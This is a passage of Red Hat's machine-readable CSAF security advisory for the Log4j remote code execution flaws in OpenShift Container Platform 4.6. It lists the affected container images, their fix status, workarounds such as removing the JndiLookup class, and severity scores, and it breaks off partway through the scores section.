{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Critical" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "An update is now available for Red Hat OpenShift Container Platform 4.6.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Red Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. 
and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2021:5106", "url": "https://access.redhat.com/errata/RHSA-2021:5106" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#critical", "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "category": "external", "summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "external", "summary": "2032580", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2032580" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5106.json" } ], "title": "Red Hat Security Advisory: OpenShift Container Platform 4.6.z security update", "tracking": { "current_release_date": "2024-12-12T01:17:55+00:00", "generator": { "date": "2024-12-12T01:17:55+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.3" } }, "id": "RHSA-2021:5106", "initial_release_date": "2021-12-16T06:12:27+00:00", "revision_history": [ { "date": "2021-12-16T06:12:27+00:00", "number": "1", "summary": "Initial version" }, { "date": "2021-12-16T06:12:27+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-12-12T01:17:55+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": 
[ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat OpenShift Container Platform 4.6", "product": { "name": "Red Hat OpenShift Container Platform 4.6", "product_id": "8Base-RHOSE-4.6", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift:4.6::el8" } } } ], "category": "product_family", "name": "Red Hat OpenShift Enterprise" }, { "branches": [ { "category": "product_version", "name": "openshift4/ose-elasticsearch-operator@sha256:d0916cd9a19901ff6c8b24f0f27db9e9f9322f8fc6eb9e773c4b43fe98800416_s390x", "product": { "name": "openshift4/ose-elasticsearch-operator@sha256:d0916cd9a19901ff6c8b24f0f27db9e9f9322f8fc6eb9e773c4b43fe98800416_s390x", "product_id": "openshift4/ose-elasticsearch-operator@sha256:d0916cd9a19901ff6c8b24f0f27db9e9f9322f8fc6eb9e773c4b43fe98800416_s390x", "product_identification_helper": { "purl": "pkg:oci/ose-elasticsearch-operator@sha256:d0916cd9a19901ff6c8b24f0f27db9e9f9322f8fc6eb9e773c4b43fe98800416?arch=s390x\u0026repository_url=registry.redhat.io/openshift4/ose-elasticsearch-operator\u0026tag=v4.6.0-202112140939.p0.gd421c69.assembly.art3594" } } }, { "category": "product_version", "name": "openshift4/ose-logging-elasticsearch6@sha256:416510e6e489dfb1ab1f0b2091015dcb0adac637ed37f1e18d30f128c45b93d2_s390x", "product": { "name": "openshift4/ose-logging-elasticsearch6@sha256:416510e6e489dfb1ab1f0b2091015dcb0adac637ed37f1e18d30f128c45b93d2_s390x", "product_id": "openshift4/ose-logging-elasticsearch6@sha256:416510e6e489dfb1ab1f0b2091015dcb0adac637ed37f1e18d30f128c45b93d2_s390x", "product_identification_helper": { "purl": "pkg:oci/ose-logging-elasticsearch6@sha256:416510e6e489dfb1ab1f0b2091015dcb0adac637ed37f1e18d30f128c45b93d2?arch=s390x\u0026repository_url=registry.redhat.io/openshift4/ose-logging-elasticsearch6\u0026tag=v4.6.0-202112132021.p0.g2a13a81.assembly.stream" } } } ], "category": "architecture", "name": "s390x" }, { "branches": [ { "category": "product_version", "name": 
"openshift4/ose-elasticsearch-operator@sha256:dfd7356ce68d9ff2498655c07b7d700872185597c0c2855d6721acb2ae5e6b5c_ppc64le", "product": { "name": "openshift4/ose-elasticsearch-operator@sha256:dfd7356ce68d9ff2498655c07b7d700872185597c0c2855d6721acb2ae5e6b5c_ppc64le", "product_id": "openshift4/ose-elasticsearch-operator@sha256:dfd7356ce68d9ff2498655c07b7d700872185597c0c2855d6721acb2ae5e6b5c_ppc64le", "product_identification_helper": { "purl": "pkg:oci/ose-elasticsearch-operator@sha256:dfd7356ce68d9ff2498655c07b7d700872185597c0c2855d6721acb2ae5e6b5c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4/ose-elasticsearch-operator\u0026tag=v4.6.0-202112140939.p0.gd421c69.assembly.art3594" } } }, { "category": "product_version", "name": "openshift4/ose-logging-elasticsearch6@sha256:ebc6a802dc110dddaae352c3a142fbeae1169d5c35fc0f77ef7e64b810c863af_ppc64le", "product": { "name": "openshift4/ose-logging-elasticsearch6@sha256:ebc6a802dc110dddaae352c3a142fbeae1169d5c35fc0f77ef7e64b810c863af_ppc64le", "product_id": "openshift4/ose-logging-elasticsearch6@sha256:ebc6a802dc110dddaae352c3a142fbeae1169d5c35fc0f77ef7e64b810c863af_ppc64le", "product_identification_helper": { "purl": "pkg:oci/ose-logging-elasticsearch6@sha256:ebc6a802dc110dddaae352c3a142fbeae1169d5c35fc0f77ef7e64b810c863af?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4/ose-logging-elasticsearch6\u0026tag=v4.6.0-202112132021.p0.g2a13a81.assembly.stream" } } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "openshift4/ose-elasticsearch-operator@sha256:8db02b3087c2c89bafaf6896d67462af54e77ba3c2fb299a84ab7886f1b92ce1_amd64", "product": { "name": "openshift4/ose-elasticsearch-operator@sha256:8db02b3087c2c89bafaf6896d67462af54e77ba3c2fb299a84ab7886f1b92ce1_amd64", "product_id": "openshift4/ose-elasticsearch-operator@sha256:8db02b3087c2c89bafaf6896d67462af54e77ba3c2fb299a84ab7886f1b92ce1_amd64", "product_identification_helper": { "purl": 
"pkg:oci/ose-elasticsearch-operator@sha256:8db02b3087c2c89bafaf6896d67462af54e77ba3c2fb299a84ab7886f1b92ce1?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-elasticsearch-operator\u0026tag=v4.6.0-202112140939.p0.gd421c69.assembly.art3594" } } }, { "category": "product_version", "name": "openshift4/ose-elasticsearch-operator-bundle@sha256:b0b6c17769c6ec87496d14b2bcfbfbd035782671bbf6e6934dc2f240f1033902_amd64", "product": { "name": "openshift4/ose-elasticsearch-operator-bundle@sha256:b0b6c17769c6ec87496d14b2bcfbfbd035782671bbf6e6934dc2f240f1033902_amd64", "product_id": "openshift4/ose-elasticsearch-operator-bundle@sha256:b0b6c17769c6ec87496d14b2bcfbfbd035782671bbf6e6934dc2f240f1033902_amd64", "product_identification_helper": { "purl": "pkg:oci/ose-elasticsearch-operator-bundle@sha256:b0b6c17769c6ec87496d14b2bcfbfbd035782671bbf6e6934dc2f240f1033902?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-elasticsearch-operator-bundle\u0026tag=v4.6.0.202112140939.p0.gd421c69.assembly.art3594-1" } } }, { "category": "product_version", "name": "openshift4/ose-metering-hive@sha256:2a8670a968b37e04539c052b399e539d60a006bdf4e46d5066bc04530da8f532_amd64", "product": { "name": "openshift4/ose-metering-hive@sha256:2a8670a968b37e04539c052b399e539d60a006bdf4e46d5066bc04530da8f532_amd64", "product_id": "openshift4/ose-metering-hive@sha256:2a8670a968b37e04539c052b399e539d60a006bdf4e46d5066bc04530da8f532_amd64", "product_identification_helper": { "purl": "pkg:oci/ose-metering-hive@sha256:2a8670a968b37e04539c052b399e539d60a006bdf4e46d5066bc04530da8f532?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-hive\u0026tag=v4.6.0-202112140546.p0.g8b9da97.assembly.stream" } } }, { "category": "product_version", "name": "openshift4/ose-logging-elasticsearch6@sha256:8b0d423982c960d81f8e1ade8482ba064507863283aec360ac63f31f0ffdb24f_amd64", "product": { "name": 
"openshift4/ose-logging-elasticsearch6@sha256:8b0d423982c960d81f8e1ade8482ba064507863283aec360ac63f31f0ffdb24f_amd64", "product_id": "openshift4/ose-logging-elasticsearch6@sha256:8b0d423982c960d81f8e1ade8482ba064507863283aec360ac63f31f0ffdb24f_amd64", "product_identification_helper": { "purl": "pkg:oci/ose-logging-elasticsearch6@sha256:8b0d423982c960d81f8e1ade8482ba064507863283aec360ac63f31f0ffdb24f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-logging-elasticsearch6\u0026tag=v4.6.0-202112132021.p0.g2a13a81.assembly.stream" } } }, { "category": "product_version", "name": "openshift4/ose-metering-ansible-operator@sha256:fc3a7d606162c571647e0a4f6184091eddc1fe360e93d7692d1195559a7a74db_amd64", "product": { "name": "openshift4/ose-metering-ansible-operator@sha256:fc3a7d606162c571647e0a4f6184091eddc1fe360e93d7692d1195559a7a74db_amd64", "product_id": "openshift4/ose-metering-ansible-operator@sha256:fc3a7d606162c571647e0a4f6184091eddc1fe360e93d7692d1195559a7a74db_amd64", "product_identification_helper": { "purl": "pkg:oci/ose-metering-ansible-operator@sha256:fc3a7d606162c571647e0a4f6184091eddc1fe360e93d7692d1195559a7a74db?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-ansible-operator\u0026tag=v4.6.0-202112140831.p0.gd74112d.assembly.art3594" } } }, { "category": "product_version", "name": "openshift4/ose-metering-ansible-operator-bundle@sha256:7c67b7bcdc6e35f38905aff84f007a2b77c727836f256a0c038934ab62c7011e_amd64", "product": { "name": "openshift4/ose-metering-ansible-operator-bundle@sha256:7c67b7bcdc6e35f38905aff84f007a2b77c727836f256a0c038934ab62c7011e_amd64", "product_id": "openshift4/ose-metering-ansible-operator-bundle@sha256:7c67b7bcdc6e35f38905aff84f007a2b77c727836f256a0c038934ab62c7011e_amd64", "product_identification_helper": { "purl": 
"pkg:oci/ose-metering-ansible-operator-bundle@sha256:7c67b7bcdc6e35f38905aff84f007a2b77c727836f256a0c038934ab62c7011e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-ansible-operator-bundle\u0026tag=v4.6.0.202112140831.p0.gd74112d.assembly.art3594-1" } } } ], "category": "architecture", "name": "amd64" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "openshift4/ose-elasticsearch-operator-bundle@sha256:b0b6c17769c6ec87496d14b2bcfbfbd035782671bbf6e6934dc2f240f1033902_amd64 as a component of Red Hat OpenShift Container Platform 4.6", "product_id": "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator-bundle@sha256:b0b6c17769c6ec87496d14b2bcfbfbd035782671bbf6e6934dc2f240f1033902_amd64" }, "product_reference": "openshift4/ose-elasticsearch-operator-bundle@sha256:b0b6c17769c6ec87496d14b2bcfbfbd035782671bbf6e6934dc2f240f1033902_amd64", "relates_to_product_reference": "8Base-RHOSE-4.6" }, { "category": "default_component_of", "full_product_name": { "name": "openshift4/ose-elasticsearch-operator@sha256:8db02b3087c2c89bafaf6896d67462af54e77ba3c2fb299a84ab7886f1b92ce1_amd64 as a component of Red Hat OpenShift Container Platform 4.6", "product_id": "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:8db02b3087c2c89bafaf6896d67462af54e77ba3c2fb299a84ab7886f1b92ce1_amd64" }, "product_reference": "openshift4/ose-elasticsearch-operator@sha256:8db02b3087c2c89bafaf6896d67462af54e77ba3c2fb299a84ab7886f1b92ce1_amd64", "relates_to_product_reference": "8Base-RHOSE-4.6" }, { "category": "default_component_of", "full_product_name": { "name": "openshift4/ose-elasticsearch-operator@sha256:d0916cd9a19901ff6c8b24f0f27db9e9f9322f8fc6eb9e773c4b43fe98800416_s390x as a component of Red Hat OpenShift Container Platform 4.6", "product_id": "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:d0916cd9a19901ff6c8b24f0f27db9e9f9322f8fc6eb9e773c4b43fe98800416_s390x" }, 
"product_reference": "openshift4/ose-elasticsearch-operator@sha256:d0916cd9a19901ff6c8b24f0f27db9e9f9322f8fc6eb9e773c4b43fe98800416_s390x", "relates_to_product_reference": "8Base-RHOSE-4.6" }, { "category": "default_component_of", "full_product_name": { "name": "openshift4/ose-elasticsearch-operator@sha256:dfd7356ce68d9ff2498655c07b7d700872185597c0c2855d6721acb2ae5e6b5c_ppc64le as a component of Red Hat OpenShift Container Platform 4.6", "product_id": "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:dfd7356ce68d9ff2498655c07b7d700872185597c0c2855d6721acb2ae5e6b5c_ppc64le" }, "product_reference": "openshift4/ose-elasticsearch-operator@sha256:dfd7356ce68d9ff2498655c07b7d700872185597c0c2855d6721acb2ae5e6b5c_ppc64le", "relates_to_product_reference": "8Base-RHOSE-4.6" }, { "category": "default_component_of", "full_product_name": { "name": "openshift4/ose-logging-elasticsearch6@sha256:416510e6e489dfb1ab1f0b2091015dcb0adac637ed37f1e18d30f128c45b93d2_s390x as a component of Red Hat OpenShift Container Platform 4.6", "product_id": "8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:416510e6e489dfb1ab1f0b2091015dcb0adac637ed37f1e18d30f128c45b93d2_s390x" }, "product_reference": "openshift4/ose-logging-elasticsearch6@sha256:416510e6e489dfb1ab1f0b2091015dcb0adac637ed37f1e18d30f128c45b93d2_s390x", "relates_to_product_reference": "8Base-RHOSE-4.6" }, { "category": "default_component_of", "full_product_name": { "name": "openshift4/ose-logging-elasticsearch6@sha256:8b0d423982c960d81f8e1ade8482ba064507863283aec360ac63f31f0ffdb24f_amd64 as a component of Red Hat OpenShift Container Platform 4.6", "product_id": "8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:8b0d423982c960d81f8e1ade8482ba064507863283aec360ac63f31f0ffdb24f_amd64" }, "product_reference": "openshift4/ose-logging-elasticsearch6@sha256:8b0d423982c960d81f8e1ade8482ba064507863283aec360ac63f31f0ffdb24f_amd64", "relates_to_product_reference": "8Base-RHOSE-4.6" }, { "category": 
"default_component_of", "full_product_name": { "name": "openshift4/ose-logging-elasticsearch6@sha256:ebc6a802dc110dddaae352c3a142fbeae1169d5c35fc0f77ef7e64b810c863af_ppc64le as a component of Red Hat OpenShift Container Platform 4.6", "product_id": "8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:ebc6a802dc110dddaae352c3a142fbeae1169d5c35fc0f77ef7e64b810c863af_ppc64le" }, "product_reference": "openshift4/ose-logging-elasticsearch6@sha256:ebc6a802dc110dddaae352c3a142fbeae1169d5c35fc0f77ef7e64b810c863af_ppc64le", "relates_to_product_reference": "8Base-RHOSE-4.6" }, { "category": "default_component_of", "full_product_name": { "name": "openshift4/ose-metering-ansible-operator-bundle@sha256:7c67b7bcdc6e35f38905aff84f007a2b77c727836f256a0c038934ab62c7011e_amd64 as a component of Red Hat OpenShift Container Platform 4.6", "product_id": "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:7c67b7bcdc6e35f38905aff84f007a2b77c727836f256a0c038934ab62c7011e_amd64" }, "product_reference": "openshift4/ose-metering-ansible-operator-bundle@sha256:7c67b7bcdc6e35f38905aff84f007a2b77c727836f256a0c038934ab62c7011e_amd64", "relates_to_product_reference": "8Base-RHOSE-4.6" }, { "category": "default_component_of", "full_product_name": { "name": "openshift4/ose-metering-ansible-operator@sha256:fc3a7d606162c571647e0a4f6184091eddc1fe360e93d7692d1195559a7a74db_amd64 as a component of Red Hat OpenShift Container Platform 4.6", "product_id": "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:fc3a7d606162c571647e0a4f6184091eddc1fe360e93d7692d1195559a7a74db_amd64" }, "product_reference": "openshift4/ose-metering-ansible-operator@sha256:fc3a7d606162c571647e0a4f6184091eddc1fe360e93d7692d1195559a7a74db_amd64", "relates_to_product_reference": "8Base-RHOSE-4.6" }, { "category": "default_component_of", "full_product_name": { "name": "openshift4/ose-metering-hive@sha256:2a8670a968b37e04539c052b399e539d60a006bdf4e46d5066bc04530da8f532_amd64 as a component of 
Red Hat OpenShift Container Platform 4.6", "product_id": "8Base-RHOSE-4.6:openshift4/ose-metering-hive@sha256:2a8670a968b37e04539c052b399e539d60a006bdf4e46d5066bc04530da8f532_amd64" }, "product_reference": "openshift4/ose-metering-hive@sha256:2a8670a968b37e04539c052b399e539d60a006bdf4e46d5066bc04530da8f532_amd64", "relates_to_product_reference": "8Base-RHOSE-4.6" } ] }, "vulnerabilities": [ { "cve": "CVE-2021-44228", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "discovery_date": "2021-12-10T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator-bundle@sha256:b0b6c17769c6ec87496d14b2bcfbfbd035782671bbf6e6934dc2f240f1033902_amd64", "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:8db02b3087c2c89bafaf6896d67462af54e77ba3c2fb299a84ab7886f1b92ce1_amd64", "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:d0916cd9a19901ff6c8b24f0f27db9e9f9322f8fc6eb9e773c4b43fe98800416_s390x", "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:dfd7356ce68d9ff2498655c07b7d700872185597c0c2855d6721acb2ae5e6b5c_ppc64le", "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:7c67b7bcdc6e35f38905aff84f007a2b77c727836f256a0c038934ab62c7011e_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:fc3a7d606162c571647e0a4f6184091eddc1fe360e93d7692d1195559a7a74db_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2030932" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. 
A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value", "title": "Vulnerability summary" }, { "category": "other", "text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. 
This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:416510e6e489dfb1ab1f0b2091015dcb0adac637ed37f1e18d30f128c45b93d2_s390x", "8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:8b0d423982c960d81f8e1ade8482ba064507863283aec360ac63f31f0ffdb24f_amd64", "8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:ebc6a802dc110dddaae352c3a142fbeae1169d5c35fc0f77ef7e64b810c863af_ppc64le", "8Base-RHOSE-4.6:openshift4/ose-metering-hive@sha256:2a8670a968b37e04539c052b399e539d60a006bdf4e46d5066bc04530da8f532_amd64" ], "known_not_affected": [ "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator-bundle@sha256:b0b6c17769c6ec87496d14b2bcfbfbd035782671bbf6e6934dc2f240f1033902_amd64", 
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:8db02b3087c2c89bafaf6896d67462af54e77ba3c2fb299a84ab7886f1b92ce1_amd64", "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:d0916cd9a19901ff6c8b24f0f27db9e9f9322f8fc6eb9e773c4b43fe98800416_s390x", "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:dfd7356ce68d9ff2498655c07b7d700872185597c0c2855d6721acb2ae5e6b5c_ppc64le", "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:7c67b7bcdc6e35f38905aff84f007a2b77c727836f256a0c038934ab62c7011e_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:fc3a7d606162c571647e0a4f6184091eddc1fe360e93d7692d1195559a7a74db_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-44228" }, { "category": "external", "summary": "RHBZ#2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "external", "summary": "RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228", "url": "https://www.cve.org/CVERecord?id=CVE-2021-44228" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228" }, { "category": "external", "summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q", "url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q" }, { "category": "external", "summary": "https://logging.apache.org/log4j/2.x/security.html", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/", "url": "https://www.lunasec.io/docs/blog/log4j-zero-day/" }, { "category": "external", "summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } 
], "release_date": "2021-12-10T02:01:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-16T06:12:27+00:00", "details": "For OpenShift Container Platform 4.6 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.6/updating/updating-cluster-cli.html", "product_ids": [ "8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:416510e6e489dfb1ab1f0b2091015dcb0adac637ed37f1e18d30f128c45b93d2_s390x", "8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:8b0d423982c960d81f8e1ade8482ba064507863283aec360ac63f31f0ffdb24f_amd64", "8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:ebc6a802dc110dddaae352c3a142fbeae1169d5c35fc0f77ef7e64b810c863af_ppc64le", "8Base-RHOSE-4.6:openshift4/ose-metering-hive@sha256:2a8670a968b37e04539c052b399e539d60a006bdf4e46d5066bc04530da8f532_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5106" }, { "category": "workaround", "details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. 
For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441", "product_ids": [ "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator-bundle@sha256:b0b6c17769c6ec87496d14b2bcfbfbd035782671bbf6e6934dc2f240f1033902_amd64", "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:8db02b3087c2c89bafaf6896d67462af54e77ba3c2fb299a84ab7886f1b92ce1_amd64", "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:d0916cd9a19901ff6c8b24f0f27db9e9f9322f8fc6eb9e773c4b43fe98800416_s390x", "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:dfd7356ce68d9ff2498655c07b7d700872185597c0c2855d6721acb2ae5e6b5c_ppc64le", "8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:416510e6e489dfb1ab1f0b2091015dcb0adac637ed37f1e18d30f128c45b93d2_s390x", "8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:8b0d423982c960d81f8e1ade8482ba064507863283aec360ac63f31f0ffdb24f_amd64", "8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:ebc6a802dc110dddaae352c3a142fbeae1169d5c35fc0f77ef7e64b810c863af_ppc64le", "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:7c67b7bcdc6e35f38905aff84f007a2b77c727836f256a0c038934ab62c7011e_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:fc3a7d606162c571647e0a4f6184091eddc1fe360e93d7692d1195559a7a74db_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-hive@sha256:2a8670a968b37e04539c052b399e539d60a006bdf4e46d5066bc04530da8f532_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator-bundle@sha256:b0b6c17769c6ec87496d14b2bcfbfbd035782671bbf6e6934dc2f240f1033902_amd64", "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:8db02b3087c2c89bafaf6896d67462af54e77ba3c2fb299a84ab7886f1b92ce1_amd64", "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:d0916cd9a19901ff6c8b24f0f27db9e9f9322f8fc6eb9e773c4b43fe98800416_s390x", "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:dfd7356ce68d9ff2498655c07b7d700872185597c0c2855d6721acb2ae5e6b5c_ppc64le", "8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:416510e6e489dfb1ab1f0b2091015dcb0adac637ed37f1e18d30f128c45b93d2_s390x", "8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:8b0d423982c960d81f8e1ade8482ba064507863283aec360ac63f31f0ffdb24f_amd64", "8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:ebc6a802dc110dddaae352c3a142fbeae1169d5c35fc0f77ef7e64b810c863af_ppc64le", "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:7c67b7bcdc6e35f38905aff84f007a2b77c727836f256a0c038934ab62c7011e_amd64", 